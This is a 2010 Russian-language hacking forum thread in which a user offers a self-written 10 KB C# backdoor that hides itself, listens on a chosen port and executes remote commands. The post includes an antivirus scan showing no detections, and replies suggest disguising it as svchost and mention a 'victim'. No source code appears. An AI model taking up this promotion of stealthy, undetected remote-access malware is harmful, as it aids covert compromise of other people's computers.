Небольшой бекдор от меня..(клиент+сервер)

Недавно написал бекдор для своих целей. Решил поделить, потому что:
[+] - Ничем не палится.
[+] - Весит 10кб.
[+] - Можно открыть любой порт и спрятать(будет только в процессах).
[+] - Главный поток ничем не забит -> не тормозит.
[+] - Можно конектиться к серверу сколько влезет, пока он есть в процессах.
[-] - Не пишется в автозагрузку. Могу сделать, просто с мои личные, эта цель не входила.




P.S. В качестве клиента советую юзать NetCat, свой клиент написал за 5 мин, так как не хотел изобретать велосипед))

How2:
Открываем nvvsvc.exe вписываем свой порт, жмем Open, затем Hide Me, и сервер остается только в процессах.
Затем в клиенте конектимся , и отсылаем команду) И нам приходит результат ее выполнения.

[ Download this shit ]

Хотелось бы услышать предложения по развитию этого сервера)

Code:

Report date:2010-05-12 19:15:39 (GMT 1)                  File name:nvvsvc.exe                 File size:10752 bytes                 MD5 hash:e662c3ebed0894f2cd018b1e5d179c2e                 SHA1 hash:8a0a78a31aeb4c067fb44f1288fddb0c45d07511                                 Detection rate:                 0 on 20 (0%)                Status:CLEAN                                                                                                                                                               AntivirusDatabaseEngineResult                                               a-squared12/05/20105.0.0.7-Avast100331-14.8.1368-AVG271.1.1/28689.0.0.725-Avira AntiVir7.10.7.917.6.0.59-BitDefender12/05/20107.0.0.2555-ClamAV12/05/20100.96.1-Comodo34683.13.579-Dr.Web12/05/20105.0-F-PROT6201005124.5.1.85-G-Data21.1402.0.7309.847-Ikarus T312/05/20101.1.84.0-Kaspersky12/05/20109.0.0.736-McAfee31/03/20105.1.0.0-NOD3251094.0.474-Panda11/05/201010.0.3.0-Solo12/05/20109.0-2010-TrendMicro1619.120-1004-VBA3212/05/20103.12.12.2-VirusBuster
1.5.6-Zoner12/05/20100.2-                                                                                                                                Extra information                                               File type:Executable File (EXE)Packer:Nothing foundBinder detector:Nothing foundPDF analyzer:Nothing found

_http://scanner.novirusthanks.org/analysis/e662c3ebed0894f2cd018b1e5d179c2e/bnZ2c3ZjLmV4ZQ==/

 

если не ошибаюсь, запретная тема на форуме

 

Ну его к вирусам отнести сложно, его можно например использовать в полне мирных целях

 

Согласен, но с другой стороны он не пишется в автозагрузку, пользователь должен разрешить доступ к сети, ну и так далее)

 

мне вполне понравилось.... все просто.

 

Тс сидиш попивает чайок читая логи от ачатавцев ))))))))))) шучю

 

Console mode есть?

 

Adio, боже мой) ты что.. Я лучше куплю загрузок.
ghostwizard, так там только и есть консолька

 

под какой .NET ?

 

У меня framework 3.5 , на других не тестировал.

 

у меня тоже 3.5, но выдает ошибку.... сейчас разберемся)

 

MAQUEEN, а на каком именно моменте?
Может это мало на что повлияет, но у меня Win 7 x64.

 

у ня XP.. переустановил NET, все норма) спс ище раз.

 

а на чем писал ?

 

На C#.(VC# 2008)

 

Возьму тебя на заметку

 

чушь.... но за работу +

 

Лучше уже запустить на компе жертвы телнет.

 

warkk,а как ты его спрячешь? + это весит 10 кб)
+ этот можно назвать svchost и все)

 

Я имел ввиду запуск твоей утилиты с консоли, без окошка с кнопочками. Типа: "bdoor.exe /hide /port 7778"